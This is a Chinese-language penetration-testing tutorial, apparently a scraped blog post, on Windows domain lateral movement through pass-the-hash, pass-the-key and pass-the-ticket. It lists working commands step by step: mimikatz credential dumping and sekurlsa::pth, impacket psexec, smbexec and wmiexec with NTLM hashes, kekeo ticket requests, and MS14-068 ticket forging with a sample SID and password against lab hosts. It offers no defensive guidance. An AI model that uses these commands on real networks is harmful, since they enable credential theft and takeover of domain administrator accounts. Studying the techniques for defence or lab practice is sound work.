Mimikatz在本文章中会用到的命令

privilege::debug         #提升权限
sekurlsa::logonpasswords    #抓取密码信息
sekurlsa::msv               #抓取LM、NTLM、值
sekurlsa::ekeys             #抓取aes值

哈希传递攻击(PTH)

简介:

哈希传递(Pass The Hash)攻击,该方法通过找到与账户相关的密码散列值来进行攻击,在Windows Server 2012 R2之前使用到的密码散列值是LM、NTLM,在Windows Server 2012 R2 及其版本之后使用到的密码散列值是NTLM Hash。

在域环境中,用户登录计算机时使用的大概都是域账号,并且许多计算机在安装时会使用相同的本地管理员账户密码,因此如果计算机的本地管理员账户和密码相同的话,攻击者就能使用哈希传递攻击的方法登录内网中的其他计算机。

条件:

有管理员的密码散列值,并且目标机器开放445端口(SMB服务)。

进行攻击:

1.使用mimikatz进行哈希传递攻击:

使用mimikatz获得散列值,还得到了域名、域用户名,除此之外还需要域内主机的ip地址

sekurlsa::msv

在mimikatz中运行以下命令

sekurlsa::pth /user:域用户名 /domain:域名 /ntlm:域用户名的NTLM值
sekurlsa::pth /user:administrator /domain:god /ntlm:8c535a2d84c3b21059d667639bb89db5

运行完成之后会自己跳一个cmd窗口,然后在跳出来的cmd窗口中连接任意一个域内ip地址进行连接

net use \\192.168.52.138 #建立IPC连接
dir \\192.168.52.138\c$     #查看连接域内ip的c盘文件夹

使用mimikazt有一个缺点就是需要建立IPC连接,除了使用mimikatz进行哈希传递攻击外,我们还可以使用其他工具进行哈希传递攻击,下面演示impacket工具包中的两种工具,注意,这个工具包里面的工具可以使用哈希进行利用的,如果使用的是微软官方的Pstools工具包的工具是只能使用明文进行利用的。impacket工具包下载地址:https://github.com/SecureAuthCorp/impacket

2.使用psexec进行哈希传递攻击:

使用psexec进行哈希传递攻击所需要的参数和mimikatz中进行哈希传递攻击的参数一样,都是域名、域用户名、域内主机的ip地址

psexec.exe -hashes :NTLM值 域名/域用户@域内ip地址
psexec.exe -hashes :8c535a2d84c3b21059d667639bb89db5 god/administrator@192.168.52.138

该方式进行哈希传递攻击的优点是不需要建立IPC连接。

3.使用smbexec进行哈希传递攻击:

smbexec.exe -hashes :NTLM值 域名/域用户@域内ip地址
smbexec.exe -hashes :8c535a2d84c3b21059d667639bb89db5 god/administrator@192.168.52.138

以上三种哈希传递攻击都是使用到445端口(SMB服务)而没有用到135端口,接下来演示445端口配合135端口进行哈希传递攻击

4.使用wmiexec进行哈希传递攻击:

缺点是一次只能执行一次命令,而上面三种都是可以执行很多次命令。

wmiexec -hashes :8c535a2d84c3b21059d667639bb89db5 god/administrator@192.168.52.138 "ipconfig"

进行哈希传递攻击的时候需要注意以下两点:

  • dir命令后面要使用主机名,不能用IP,否则报错
  • 使用mimikatz进行哈希传递要具有本地管理员权限

密钥传递攻击(PTK)

简介:

密钥传递攻击只能在打了kb2871997

条件:

打了kb2871997补丁才能任意用户都可以连接,采用 aes256 连接。

进行攻击:

mimikatz获取aes值

sekurlsa::ekeys

sekurlsa::pth /user:域用户名 /domain:域名 /aes256:aes256值 hash
sekurlsa::pth /user:administrator /domain:god /aes256:bd25b5ae78c10e3fcda9693cd31027d70383063a1d8c2b835c6fa1c416b79669

在实际上,PTK传递比PTH传递用的少,因为PTK传递需要一个前提条件,需要域控安装KB2871997补丁的Win7/2008r2/8/2012(2019尝试也可以,并没有装补丁)。

票据传递攻击(PTT)

简介:

不需要管理员权限就可以获得远程系统的访问权限,Pass The Ticket 票据传递(PTT攻击)实现「未授权」访问。

条件:

进行攻击:

1.使用mimikatz进行票据传递攻击:

因为当前主机肯定之前与其他主机连接过,所以本地应该生成了一些票据,我们可以导出这些票据,然后再导入票据,利用。该方法类似于cookie欺骗。

缺点:票据是有有效期的,一般为10小时,所以如果当前主机10h之内连接过域控的话,我们可以利用该票据,但是如果超过10h,就没法利用了。

导入票据

sekurlsa::tickets /export

删除票据,排除干扰

klist purge

导入票据

kerberos::ptt 票据文件
kerberos::pttC:\Users\Administrator\Desktop\mimikatz_trunk\x64\[0;3e7]-2-0-60a00000-STU1$@krbtgt-GOD.ORG.kirbi

进行利用

dir \\192.168.52.138\c$

下面的两种方式由于靶机发生故障了,所以借用网上的图片。

2.利用工具kekeo

生成票据,导入票据

kekeo "tgt::ask /user:mary /domain:god.org /ntlm:518b98ad4178a53695dc997aa02d455c" //生成票据
kerberos::ptt TGT_mary@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi //导入票据

查看凭证 klist

利用

dir \192.168.3.21\c$
dir \\OWA2010CN-God.god.org\c$

3.利用漏洞ms14-068

whoami/user 查看当前sid

我们知道mary就是域内一个普通用户

清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造

klist //查看凭证列表
klist purge //清空当前机器中所有凭证,如果有域成员凭证会影响凭证伪造

利用MS14-068生成TGT数据

ms14-068.exe -u 域成员名@域名 -s sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u mary@god.org -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d 192.168.3.21 -p admin!@#45

将票据注入到内存中

./mimikatz.exe
kerberos::ptc TGT_mary@god.org.ccache
exit

查看凭证列表。klist 查看一下,注入成功。

利用

dir \192.168.3.21\c$
dir \\OWA2010CN-God.god.org\c$

总结

PTH和PTK需要管理员权限,其中PTK要求更为苛刻,PTK需要打了kb2871997补丁才能够使用,因此一般情况下不考虑使用PTK。而PTT利用漏洞MS14-068可以直接从普通域成员提权到域管理员权限。因此一般应该靠考虑使用MS14-068进行横向移动。

哈希传递PTH、密钥传递PTT、票据传递PTK的实现和比较相关推荐

  1. 内网横向移动|PTT票据传递横向|Mimikatz Kerberos

    票据传递攻击(Pass the Ticket,PtT) 票据传递攻击(PtT)是基于Kerberos认证的一种攻击方法,常用来做后渗透权限维持,黄金票据攻击利用的前提是得到了域内krbtgt用户的NT ...

  2. 域渗透PTT票据传递攻击(Pass the Ticket)

    文中主要讲解内网域环境,通过学习掌握域环境,更快知晓内网工作原理.本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精:本文中提到的任何技术都源 ...

  3. 【内网安全】域横向PTHPTKPTT哈希票据传递

    Kerberos协议具体工作方法,在域中,简要介绍一下: • 客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥),发送给kdc(域控),kdc对用户进行检测 ...

  4. 内网域横向PTHPTKPTT哈希票据传递

    内网域横向PTH&PTK&PTT哈希票据传递 文章目录 内网域横向PTH&PTK&PTT哈希票据传递 PTH,PTT,PTK概念: 总结:KB2871997 补丁后的影 ...

  5. 【内网学习笔记】21、哈希传递与票据传递

    1.哈希传递 哈希传递(Pass The Hash, PTH)顾名思义,就是利用哈希去登录内网中的其他机器,而不是通过明文密码登录的方式. 通过哈希传递,攻击者不需要花时间破解哈希值得到明文,在Win ...

  6. mimikatz使用哈希 ntlm传递 票据传递

    (1)管理员运行 (2)必须输入 privilege::debug (3)在目标主机使用mimikatz获取ntlm hash winserver 2012R2 之前版本 可以获取到明文密码 seku ...

  7. 【内网渗透】域横向PTHPTKPTT哈希票据传递

    目录 0x001 相关知识 0x002 域横向移动PTH NTML传递 0x003 域横向移动PTK aes256传递 0x004 域横向移动PTT哈希票据传递-ms14068&kekeo&a ...

  8. 内网安全-域横向PTHPTKPTT哈希票据传递

    PTH(pass the hash) #利用 lm 或 ntlm 的值进行的渗透测试 PTT(pass the ticket) #利用的票据凭证 TGT 进行的渗透测试 PTK(pass the ke ...

  9. 内网渗透之PPT票据传递攻击(Pass the Ticket)

    文章目录 内网渗透之PPT票据传递攻击(Pass the Ticket) 前言 Kerberos 协议& Kerberos 认证原理 Kerberos 认证原理 ASREQ & ASR ...

最新文章

  1. python 爬虫工具
  2. 数据上移下移简单的存储过程
  3. oracle的操作大全,Oracle数据库操作大全(六)Oracle中操作数据
  4. python堆排序算法_python 排序 堆排序
  5. IDEA自动勾选显示类型(specify type)
  6. 如何理性看待蚂蚁金服OceanBase刷新TPC-C纪录
  7. android studio moudel,Android Studio将module变为library
  8. Netty学习4—NIO服务端报错 远程主机强迫关闭了一个现有的连接
  9. 土建中级工程师考试用书电子版_对没错!2020年湖南土建中级职称考试教材只是指导用书...
  10. marked 用户手册 在线查看
  11. AAAI2018-Long Text Generation via Adversarial Training with Leaked Information论文笔记
  12. 数据结构与算法【Java】05---排序算法总结
  13. Makefile中的CFLAGS、$^、$< 、$@
  14. 一个简单的拼音输入法,实现常用汉字的输入
  15. android之animator 和animation 的区别
  16. flutter创建/导入区块链钱包,获取余额
  17. 关于微信小程序A 与 微信小程序B 之间的跳转问题
  18. 深聊性能测试,从入门到放弃之: Windows系统性能监控(一) 性能监视器介绍及使用。
  19. 从键盘输入三角形的直角边,利用hypot()函数输出三角形的斜边
  20. Linux 下删除当前目录及子目录下的所有.o文件

热门文章

  1. 手写中文文章识别(1)——问题描述
  2. 【C++】关于日期的计算
  3. 设计简单计算机主机系统,【效率】专为Win7系统设计的最小Pomodoro-MiniPomodoro(随附...
  4. 含根式的定积分计算_定积分计算详细步骤
  5. python爬虫scrapy爬取新闻标题及链接_python爬虫框架scrapy爬取梅花网资讯信息
  6. Android启动活动用什么方法,Android - 使用intent uri从命令行启动活动
  7. 嵌入式Linux设备驱动程序开发指南18(IIO子系统(二)具有硬件触发功能的IIO子系统ADC模块)——读书笔记
  8. 为什么说阿里云和亚马逊云对比,阿里云的性价比比较低?
  9. android scroller,高级UI第四十四篇:Android Scroller详解
  10. Java泛型详解:<T>和Class<T>的使用。泛型类,泛型方法的详细使用实例